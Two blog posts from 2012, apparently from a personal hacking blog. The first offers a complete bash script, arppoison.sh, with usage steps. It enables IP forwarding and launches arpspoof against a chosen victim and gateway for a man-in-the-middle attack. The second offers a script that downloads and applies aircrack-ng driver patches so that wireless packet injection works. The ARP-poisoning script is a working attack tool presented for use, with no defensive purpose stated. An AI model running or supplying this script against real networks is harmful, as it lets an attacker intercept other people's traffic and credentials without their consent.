Tuesday, March 27, 2012

arppoison.sh - A script for to simplify ARP Poisoning for MITM attacks

   Last Night I found this script which is a script I coded years ago, 2007 to be exact. I love it when I find old stuff like this so I thought I would share it here. The script is called arppoison.sh and as the name suggest it is used to ARP poison two targets using arpspoof. Since it uses arpspoof you need to have it install. If you are using backtrack 5 it should already be installed. If you are using Ubuntu you can easily install it using apt-get to download the dsniff suite like so:

sudo apt-get install dsniff
This script is really simple to use:
  1. copy the text below into a word editor like nano or gedit.
  2. save it as arppoison.sh.
  3. run the following command against it: chmod +x arppoison.sh
  4. use the following command to run it: sudo ./arppoison.sh
  5. enter in the victim IP
  6. enter in the Gateway IP (i.e. the router)
  7. sit back as it enables IP forwarding and launches another shell running arpspoof.

   While this script is simple it is useful as it helps speed up the time it takes to launch these attacks by handling the ip forwarding configuration, launching the attack in a separate shell saving you from having to start another and load it to root. Pretty much just launch it and keep working. The code for the script is below the screen shot. Don't forget to change the niccard variable to whatever your adapter is called (in my case wlan0). Hope this helps and feel free to let me know if you have any questions.





==================================================================

#!/bin/bash
niccard=wlan0
if [[ $EUID -ne 0 ]]; then
echo -e "\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
echo -e "\t\t\t Example: sudo $0 \n"
exit 1
else
echo -e "\n\033[1;32m#######################################"
echo -e "# ARP Poison Script #"
echo -e "#######################################"
echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
echo -n "Please enter target's IP: "
read victimIP
echo -n "Please enter Gateway's IP: "
read gatewayIP
echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
echo -e "\t\t--==[Targets]==--"
echo -e "\t\tTarget: $victimIP"
echo -e "\t\tGateway: $gatewayIP \n\n"
echo -e "[*] Enabling IP Forwarding \n"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi

==================================================================

Wednesday, January 18, 2012

Ubuntu 11.10, aireplay-ng, and the "mon0 is on channel -1" error and how to fix it - shell script included

I had recently upgrade my Ubuntu install to 11.10. Along with other annoyances I came across I ran into a bit of a deal breaker when I went to run aireplay-ng. I was getting the following error:

mon0 is on channel -1, but the AP uses channel [#]


This was going to be a huge problem since I know that my ZyDAS 1211 chip set was compatible with packet injection. After searching around for a bit I found a great solution from this site here about the drivers and how to patch and reinstall the older ones back in. Below I have a script that you can run to get that installed.

Driver Patcher in action.

==================================================================


#!/bin/bash
#
# This fix was found at:
# http://linux-software-news-tutorials.blogspot.com/2011/06/solve-error-mon0-is-on-channel-1-but-ap.html
#
# If this script helps you be sure to drop him a line and
# say thanks!
echo -e "\n\033[1;32m###########################################"
echo -e "# Ubuntu Patched Drivers Installer Script #"

echo -e "# Tested on Ubuntu 11.04 and 11.10 #"
echo -e "###########################################"
echo " Coded By: Travis Phillips"
echo " Date: 01/18/2012"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Installing build-essential...\033[0m"
sudo apt-get -y install build-essential &> /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Downloading Wireless Drivers...\033[0m"
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2011-06-16.tar.bz2 &> /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Extracting...\033[0m"
tar -jxf compat-wireless-2011-06-16.tar.bz2
cd compat-wireless-2011-06-16
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Downloading Patches...\033[0m"
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch &>12 /dev/null
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch &>12 /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Applying Patches...\033[0m"
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch &> /dev/null
patch ./net/wireless/chan.c channel-negative-one-maxim.patch &> /dev/null
echo -e "\033[1;32mDone!"
echo -e "\n[*] Building patched drivers and installing."
echo -e "\n\t\033[31mTHIS WILL TAKE ABOUT 5-10 mins..."
echo -e "\tPlease be patient and do *NOT* interrupt this process\033[0m\n"
make &> /dev/null
echo -e "\t \033[1;32m[*] Compiling Complete. Installing Drivers...\033[0m\n"
sudo make install &> /dev/null
echo -e "\033[1;32m[*] Installing Patched drivers completed!"
echo -e -n "\n[*] Cleaning Up...\033[0m"
cd ..
rm compat-wireless-2011-06-16.tar.bz2
rm -rf compat-wireless-2011-06-16
echo -e "\033[1;32mDone!"
echo -e "\n\n\t\t[*] \033[1;37mScript Finished! Please reboot to finish the patch.\033[0m\n\n"



==================================================================

To run save it to a save to a file called patchwifidrivers.sh and in a terminal type

chmod +x patchwifidrivers.sh
./patchwifidrivers.sh


Hope this helps some people.